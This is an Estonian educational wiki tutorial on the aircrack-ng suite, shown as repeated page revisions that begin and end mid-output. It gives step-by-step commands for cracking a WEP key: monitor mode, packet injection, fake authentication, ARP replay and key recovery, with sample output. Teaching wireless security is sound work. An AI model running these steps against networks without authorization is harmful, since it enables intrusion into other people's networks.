2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-26T09:16:14Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-26T08:57:41Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
